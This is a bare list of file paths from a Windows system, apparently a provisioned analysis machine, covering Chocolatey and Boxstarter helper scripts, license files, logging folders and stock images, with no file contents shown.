file: C:\ba69bdf0a250e352360c33\1055\eula.rtf
file: C:\ba69bdf0a250e352360c33\2052\eula.rtf
file: C:\ba69bdf0a250e352360c33\2070\eula.rtf
file: C:\ba69bdf0a250e352360c33\3082\eula.rtf
file: C:\PSTranscripts\20251206\PowerShell_transcript.USERDUM-8A61A1P.fPMufFfM.20251206093923.txt
file: C:\PSTranscripts\20251206\PowerShell_transcript.USERDUM-8A61A1P.S6TbHpZ5.20251206094405.txt
file: C:\Sysmon\sysmonconfig.txt
file: C:\Users\All Users\Boxstarter\LICENSE.txt
file: C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\en-US\about_boxstarter_bootstrapper.help.txt
file: C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\en-US\About_Boxstarter_Variable_In_Bootstrapper.help.txt
file: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\en-US\about_boxstarter_chocolatey.help.txt
file: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\en-US\About_Boxstarter_Variable_In_Chocolatey.help.txt
file: C:\Users\All Users\Boxstarter\Boxstarter.Common\en-US\about_boxstarter_logging.help.txt
file: C:\Users\All Users\chocolatey\CREDITS.txt
file: C:\Users\All Users\chocolatey\lib\7zip.install\legal\LICENSE.txt
file: C:\Users\All Users\chocolatey\lib\autohotkey.install\tools\license.txt
file: C:\Users\All Users\chocolatey\lib\autohotkey.install\tools\VERIFICATION.txt
file: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\LICENSE.txt
file: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\en-US\about_boxstarter_bootstrapper.help.txt
file: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\en-US\About_Boxstarter_Variable_In_Bootstrapper.help.txt
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\LICENSE.txt
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\en-US\about_boxstarter_chocolatey.help.txt
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\en-US\About_Boxstarter_Variable_In_Chocolatey.help.txt
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\LICENSE.txt
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\en-US\about_boxstarter_logging.help.txt
file: C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\LICENSE.txt
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\LICENSE.txt
file: C:\Users\All Users\chocolatey\lib\Firefox\tools\LanguageChecksums.csv
file: C:\Users\All Users\chocolatey\lib\openjdk\openjdk-19.0.1_windows-x64_bin.zip.txt
file: C:\Users\All Users\chocolatey\lib\powershell-core\tools\ThirdPartyNotices.txt
file: C:\Users\All Users\chocolatey\lib\python3\legal\LICENSE.txt
file: C:\Users\All Users\chocolatey\lib\winrar\tools\downloadInfo.csv
file: C:\Users\All Users\chocolatey\tools\7zip.license.txt
file: C:\Users\All Users\chocolatey\tools\shimgen.license.txt
file: C:\Users\All Users\Microsoft\Windows NT\MSScan\WelcomeScan.jpg
file: C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg
file: C:\Users\Public\Pictures\Sample Pictures\Desert.jpg
file: C:\Users\Public\Pictures\Sample Pictures\Hydrangeas.jpg
file: C:\Users\Public\Pictures\Sample Pictures\Jellyfish.jpg
file: C:\Users\Public\Pictures\Sample Pictures\Koala.jpg
file: C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg
file: C:\Users\Public\Pictures\Sample Pictures\Penguins.jpg
file: C:\Users\Public\Pictures\Sample Pictures\Tulips.jpg
file: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\brndlog.txt
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ThirdPartyNotices.txt
file: C:\Users\user\AppData\Local\Microsoft\Windows\SipNotify\eoscontent\main.jpg
file: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\Bears.jpg
file: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\Garden.jpg
file: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\GreenBubbles.jpg
file: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\HandPrints.jpg
file: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\OrangeCircles.jpg
file: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\Peacock.jpg
file: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\Roses.jpg
file: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\ShadesOfBlue.jpg
file: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\SoftBlue.jpg
file: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\Stars.jpg
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
file: C:\Users\user\AppData\Roaming\Microsoft\Windows Photo Viewer\Windows Photo Viewer Wallpaper.jpg
file: C:\BOOTSECT.BAK
file: C:\ba69bdf0a250e352360c33\header.bmp
file: C:\ba69bdf0a250e352360c33\SplashScreen.bmp
file: C:\ba69bdf0a250e352360c33\watermark.bmp
file: C:\Users\All Users\Boxstarter\BoxstarterShell.ps1
file: C:\Users\All Users\Boxstarter\chocolateyUninstall.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Cleanup-Boxstarter.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Get-BoxstarterTempDir.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Get-PendingReboot.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Init-Settings.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Install-BoxstarterExtension.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Invoke-Boxstarter.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Invoke-Reboot.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Set-SecureAutoLogon.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Start-UpdateServices.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Stop-UpdateServices.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Test-PendingReboot.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Boxstarter.zip
file: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\BoxstarterConnectionConfig.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Chocolatey.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Enable-BoxstarterClientRemoting.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Enable-BoxstarterCredSSP.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Enable-RemotePsRemoting.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Get-BoxstarterConfig.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Get-PackageRoot.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Init-Settings.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Install-BoxstarterPackage.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Invoke-BoxstarterBuild.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Invoke-BoxstarterFromTask.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\invoke-chocolatey.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Invoke-ChocolateyBoxstarter.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\New-BoxstarterPackage.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\New-PackageFromScript.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Resolve-VMPlugin.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Send-File.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Set-BoxstarterConfig.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Set-BoxstarterShare.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Common\Confirm-Choice.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Common\Create-BoxstarterTask.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Common\Enter-DotNet4.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Common\Format-BoxStarterMessage.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Common\Get-BoxstarterTaskContextTempDir.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Common\Get-CurrentUser.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Common\Get-HttpResource.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Common\Get-IsMicrosoftUpdateEnabled.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Common\Get-IsRemote.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Common\Init-Settings.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Common\Invoke-FromTask.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Common\Invoke-RetriableScript.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Common\Log-BoxStarterMessage.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Common\Out-BoxstarterLog.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Common\Remove-BoxstarterError.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Common\Remove-BoxstarterTask.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Common\Start-TimedSection.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Common\Stop-TimedSection.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Common\Test-Admin.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Common\Write-BoxstarterLogo.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Common\Write-BoxstarterMessage.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.HyperV\Enable-BoxstarterVHD.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.HyperV\Enable-BoxstarterVM.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Disable-BingSearch.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Disable-GameBarTips.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Disable-InternetExplorerESC.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Disable-MicrosoftUpdate.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Disable-UAC.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Enable-MicrosoftUpdate.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Enable-RemoteDesktop.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Enable-UAC.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Get-LibraryNames.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Get-UAC.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Install-WindowsUpdate.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Move-LibraryDirectory.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Restart-Explorer.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Set-BoxstarterPageFile.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Set-BoxstarterTaskbarOptions.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Set-CornerNavigationOptions.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Set-ExplorerOptions.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Set-StartScreenOptions.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Set-TaskbarSmall.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Set-WindowsExplorerOptions.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Update-ExecutionPolicy.ps1
file: C:\Users\All Users\chocolatey\bin\RefreshEnv.cmd
file: C:\Users\All Users\chocolatey\extensions\chocolatey-compatibility\helpers\Get-PackageParameters.ps1
file: C:\Users\All Users\chocolatey\extensions\chocolatey-compatibility\helpers\Get-UninstallRegistryKey.ps1
file: C:\Users\All Users\chocolatey\extensions\chocolatey-compatibility\helpers\Install-ChocolateyDesktopLink.ps1
file: C:\Users\All Users\chocolatey\extensions\chocolatey-compatibility\helpers\Write-ChocolateyFailure.ps1
file: C:\Users\All Users\chocolatey\extensions\chocolatey-compatibility\helpers\Write-ChocolateySuccess.ps1
file: C:\Users\All Users\chocolatey\extensions\chocolatey-compatibility\helpers\Write-FileUpdateLog.ps1
file: C:\Users\All Users\chocolatey\extensions\chocolatey-core\Get-AppInstallLocation.ps1
file: C:\Users\All Users\chocolatey\extensions\chocolatey-core\Get-AvailableDriveLetter.ps1
file: C:\Users\All Users\chocolatey\extensions\chocolatey-core\Get-EffectiveProxy.ps1
file: C:\Users\All Users\chocolatey\extensions\chocolatey-core\Get-PackageCacheLocation.ps1
file: C:\Users\All Users\chocolatey\extensions\chocolatey-core\Get-WebContent.ps1
file: C:\Users\All Users\chocolatey\extensions\chocolatey-core\Register-Application.ps1
file: C:\Users\All Users\chocolatey\extensions\chocolatey-core\Remove-Process.ps1
file: C:\Users\All Users\chocolatey\extensions\chocolatey-dotnetfx\DotNetFrameworkHelpers.ps1
file: C:\Users\All Users\chocolatey\extensions\chocolatey-dotnetfx\Install-ChocolateyInstallPackageAndHandleExitCode.ps1
file: C:\Users\All Users\chocolatey\extensions\chocolatey-windowsupdate\Get-WindowsUpdateErrorDescription.ps1
file: C:\Users\All Users\chocolatey\extensions\chocolatey-windowsupdate\Install-ChocolateyPackageAndHandleExitCode.ps1
file: C:\Users\All Users\chocolatey\extensions\chocolatey-windowsupdate\Install-WindowsUpdate.ps1
file: C:\Users\All Users\chocolatey\extensions\chocolatey-windowsupdate\Test-WindowsUpdate.ps1
file: C:\Users\All Users\chocolatey\helpers\chocolateyScriptRunner.ps1
file: C:\Users\All Users\chocolatey\helpers\ChocolateyTabExpansion.ps1
file: C:\Users\All Users\chocolatey\helpers\functions\Format-FileSize.ps1
file: C:\Users\All Users\chocolatey\helpers\functions\Get-CheckSumValid.ps1
file: C:\Users\All Users\chocolatey\helpers\functions\Get-ChocolateyPath.ps1
file: C:\Users\All Users\chocolatey\helpers\functions\Get-ChocolateyUnzip.ps1
file: C:\Users\All Users\chocolatey\helpers\functions\Get-ChocolateyWebFile.ps1
file: C:\Users\All Users\chocolatey\helpers\functions\Get-EnvironmentVariable.ps1
file: C:\Users\All Users\chocolatey\helpers\functions\Get-EnvironmentVariableNames.ps1
file: C:\Users\All Users\chocolatey\helpers\functions\Get-FtpFile.ps1
file: C:\Users\All Users\chocolatey\helpers\functions\Get-OSArchitectureWidth.ps1
file: C:\Users\All Users\chocolatey\helpers\functions\Get-PackageParameters.ps1
file: C:\Users\All Users\chocolatey\helpers\functions\Get-ToolsLocation.ps1
file: C:\Users\All Users\chocolatey\helpers\functions\Get-UACEnabled.ps1
file: C:\Users\All Users\chocolatey\helpers\functions\Get-UninstallRegistryKey.ps1
file: C:\Users\All Users\chocolatey\helpers\functions\Get-VirusCheckValid.ps1
file: C:\Users\All Users\chocolatey\helpers\functions\Get-WebFile.ps1
file: C:\Users\All Users\chocolatey\helpers\functions\Get-WebFileName.ps1
file: C:\Users\All Users\chocolatey\helpers\functions\Get-WebHeaders.ps1
file: C:\Users\All Users\chocolatey\helpers\functions\Install-BinFile.ps1
file: C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyEnvironmentVariable.ps1
file: C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyExplorerMenuItem.ps1
file: C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyFileAssociation.ps1
file: C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyInstallPackage.ps1
file: C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyPackage.ps1
file: C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyPath.ps1
file: C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyPinnedTaskBarItem.ps1
file: C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyPowershellCommand.ps1
file: C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyShortcut.ps1
file: C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyVsixPackage.ps1
file: C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyZipPackage.ps1
file: C:\Users\All Users\chocolatey\helpers\functions\Install-Vsix.ps1
file: C:\Users\All Users\chocolatey\helpers\functions\Set-EnvironmentVariable.ps1
file: C:\Users\All Users\chocolatey\helpers\functions\Set-PowerShellExitCode.ps1
file: C:\Users\All Users\chocolatey\helpers\functions\Start-ChocolateyProcessAsAdmin.ps1
file: C:\Users\All Users\chocolatey\helpers\functions\Test-ProcessAdminRights.ps1
file: C:\Users\All Users\chocolatey\helpers\functions\Uninstall-BinFile.ps1
file: C:\Users\All Users\chocolatey\helpers\functions\Uninstall-ChocolateyEnvironmentVariable.ps1
file: C:\Users\All Users\chocolatey\helpers\functions\Uninstall-ChocolateyPackage.ps1
file: C:\Users\All Users\chocolatey\helpers\functions\UnInstall-ChocolateyZipPackage.ps1
file: C:\Users\All Users\chocolatey\helpers\functions\Update-SessionEnvironment.ps1
file: C:\Users\All Users\chocolatey\helpers\functions\Write-FunctionCallLogMessage.ps1
file: C:\Users\All Users\chocolatey\lib\boxstarter\tools\chocolateyinstall.ps1
file: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\chocolateyinstall.ps1
file: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\setup.ps1
file: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Cleanup-Boxstarter.ps1
file: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Get-BoxstarterTempDir.ps1
file: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Get-PendingReboot.ps1
file: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Init-Settings.ps1
file: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Install-BoxstarterExtension.ps1
file: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Invoke-Boxstarter.ps1
file: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Invoke-Reboot.ps1
file: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Set-SecureAutoLogon.ps1
file: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Start-UpdateServices.ps1
file: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Stop-UpdateServices.ps1
file: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Test-PendingReboot.ps1
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\BoxstarterShell.ps1
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\chocolateyinstall.ps1
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\chocolateyUninstall.ps1
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\setup.ps1
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Boxstarter.zip
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\BoxstarterConnectionConfig.ps1
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Chocolatey.ps1
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Enable-BoxstarterClientRemoting.ps1
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Enable-BoxstarterCredSSP.ps1
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Enable-RemotePsRemoting.ps1
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Get-BoxstarterConfig.ps1
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Get-PackageRoot.ps1
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Init-Settings.ps1
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Install-BoxstarterPackage.ps1
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Invoke-BoxstarterBuild.ps1
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Invoke-BoxstarterFromTask.ps1
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\invoke-chocolatey.ps1
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Invoke-ChocolateyBoxstarter.ps1
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\New-BoxstarterPackage.ps1
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\New-PackageFromScript.ps1
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Resolve-VMPlugin.ps1
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Send-File.ps1
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Set-BoxstarterConfig.ps1
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Set-BoxstarterShare.ps1
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\chocolateyinstall.ps1
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\setup.ps1
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Confirm-Choice.ps1
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Create-BoxstarterTask.ps1
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Enter-DotNet4.ps1
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Format-BoxStarterMessage.ps1
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Get-BoxstarterTaskContextTempDir.ps1
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Get-CurrentUser.ps1
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Get-HttpResource.ps1
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Get-IsMicrosoftUpdateEnabled.ps1
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Get-IsRemote.ps1
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Init-Settings.ps1
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Invoke-FromTask.ps1
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Invoke-RetriableScript.ps1
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Log-BoxStarterMessage.ps1
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Out-BoxstarterLog.ps1
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Remove-BoxstarterError.ps1
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Remove-BoxstarterTask.ps1
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Start-TimedSection.ps1
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Stop-TimedSection.ps1
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Test-Admin.ps1
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Write-BoxstarterLogo.ps1
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Write-BoxstarterMessage.ps1
file: C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\chocolateyinstall.ps1
file: C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\setup.ps1
file: C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\Boxstarter.HyperV\Enable-BoxstarterVHD.ps1
file: C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\Boxstarter.HyperV\Enable-BoxstarterVM.ps1
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\chocolateyinstall.ps1
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\setup.ps1
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Disable-BingSearch.ps1
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Disable-GameBarTips.ps1
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Disable-InternetExplorerESC.ps1
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Disable-MicrosoftUpdate.ps1
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Disable-UAC.ps1
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Enable-MicrosoftUpdate.ps1
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Enable-RemoteDesktop.ps1
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Enable-UAC.ps1
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Get-LibraryNames.ps1
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Get-UAC.ps1
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Install-WindowsUpdate.ps1
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Move-LibraryDirectory.ps1
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Restart-Explorer.ps1
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-BoxstarterPageFile.ps1
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-BoxstarterTaskbarOptions.ps1
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-CornerNavigationOptions.ps1
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-ExplorerOptions.ps1
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-StartScreenOptions.ps1
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-TaskbarSmall.ps1
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-WindowsExplorerOptions.ps1
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Update-ExecutionPolicy.ps1
file: C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\extensions\helpers\Get-PackageParameters.ps1
file: C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\extensions\helpers\Get-UninstallRegistryKey.ps1
file: C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\extensions\helpers\Install-ChocolateyDesktopLink.ps1
file: C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\extensions\helpers\Write-ChocolateyFailure.ps1
file: C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\extensions\helpers\Write-ChocolateySuccess.ps1
file: C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\extensions\helpers\Write-FileUpdateLog.ps1
file: C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\Get-AppInstallLocation.ps1
